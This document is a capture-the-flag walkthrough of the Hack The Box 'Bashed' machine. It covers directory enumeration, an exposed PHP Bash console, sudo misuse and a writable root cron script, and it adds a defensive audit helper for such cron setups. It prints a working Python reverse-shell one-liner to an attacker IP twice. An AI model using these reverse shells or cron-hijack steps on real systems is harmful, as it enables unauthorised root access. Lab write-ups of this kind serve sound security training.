
Hack The Box – Bashed Walkthrough

Introduction

This was an easy Linux machine that involved exploiting an exposed PHP Bash shell to gain initial access, a misconfigured sudo rule to escalate to the “scriptmanager” user, and a root cron job to escalate to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate application versions

The scan has only identified port 80 (HTTP) as open.

Enumerating HTTP

When accessing the web server through a browser, the following page is displayed:

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use

The scan has identified a few interesting entries, one of which is /dev. When visiting it, directory listing is enabled and a few PHP files are shown:

When accessing the “phpbash.php” file, it leads to what looks like a Bash prompt:

It also seems to function much in the same way as an actual Bash shell:

All that is left now is to obtain a shell.

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed on the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

A Python reverse shell can then be executed on the PHP Bash prompt:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.14",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

A reverse shell as the www-data user is then returned:

Local Enumeration

When executing sudo -l, it appears that the current user can execute all commands as the “scriptmanager” user:

Quickly testing this with the id command confirms that commands can be executed as that user:

sudo -u scriptmanager id

The same Python reverse shell used earlier can then be used again as the scriptmanager user:

sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.14",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

Privilege Escalation

When enumerating for files and folders owned by the scriptmanager user, an unusual “/scripts” folder is present:

find / -xdev -type f -user scriptmanager 2>/dev/null; find / -xdev -type d -user scriptmanager 2>/dev/null

A “test.py” script can be found, which currently opens the “test.txt” file and writes “testing 123!” to it:

Since the test.txt file written by the script is owned by root, the script itself is most likely being executed as root, probably by a cron job.
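From the defender's side, the weakness here is a root cron entry whose script (or the directory holding it) belongs to a non-root user. The following audit helper, added here and not part of the original walkthrough, parses /etc/crontab-style lines and flags exactly that; the function names, the sample crontab lines and the fake stat table are constructed for illustration.

```python
import os, re, stat

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH
PATH_RE = re.compile(r"(?<![\w./-])/[\w./-]+")  # absolute paths inside a command

def stat_of_fs(path):  # real lookup: (uid, mode), or None when the path is missing
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, st.st_mode

def file_reasons(path, stat_of):
    """Why a path run from root's cron could be hijacked by a non-root user."""
    info = stat_of(path)
    if info is None:
        return ["%s does not exist" % path]  # a user may be able to create it
    uid, mode = info
    reasons = []
    if uid != 0:
        reasons.append("%s is owned by uid %d, not root" % (path, uid))
    if mode & WRITE_BITS:
        reasons.append("%s is group/world writable" % path)
    parent = os.path.dirname(path) or "/"
    pinfo = stat_of(parent)  # whoever controls the directory can swap the file
    if pinfo and (pinfo[0] != 0 or pinfo[1] & WRITE_BITS and not pinfo[1] & stat.S_ISVTX):
        reasons.append("parent %s (uid %d) is not root-owned or is writable by others" % (parent, pinfo[0]))
    return reasons

def audit_system_crontab(lines, stat_of=stat_of_fs):
    """Audit /etc/crontab-style lines (schedule, user, command); root entries only."""
    findings = {}
    for line in lines:
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # comment or VAR=value assignment
        n = 1 if fields[0].startswith("@") else 5  # @hourly vs five time fields
        if len(fields) <= n + 1 or fields[n] != "root":
            continue
        for path in PATH_RE.findall(" ".join(fields[n + 1:])):
            reasons = file_reasons(path, stat_of)
            if reasons:
                findings[path] = reasons
    return findings

SAMPLE_CRONTAB = ["SHELL=/bin/bash", "# m h dom mon dow user command",  # constructed
                  "* * * * * root python /scripts/test.py",
                  "17 * * * * root cd / && run-parts --report /etc/cron.hourly"]
SAMPLE_STAT = {"/scripts": (1001, 0o40755), "/scripts/test.py": (1001, 0o100644),
               "/etc": (0, 0o40755), "/etc/cron.hourly": (0, 0o40755)}
```

On a live host, `audit_system_crontab(open("/etc/crontab").read().splitlines())` uses the real filesystem; the sample table stands in for it here so the example runs offline.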

Locally creating a Python script that will create a SUID copy of Bash:

Transferring it to the target host using Python's SimpleHTTPServer and Wget, thereby replacing the original script:

After a minute or so, the cron job has run and created the “stef” SUID copy of Bash:

Executing it with the -p flag, which stops Bash from dropping the effective user ID inherited from the SUID bit, grants root access to the host:

This has now granted root-level access to the target machine.

Conclusion

Although this box is quite trivial, it does a great job of showing some of the most common vulnerabilities and misconfigurations, such as exposed administrative consoles and insecure cron jobs.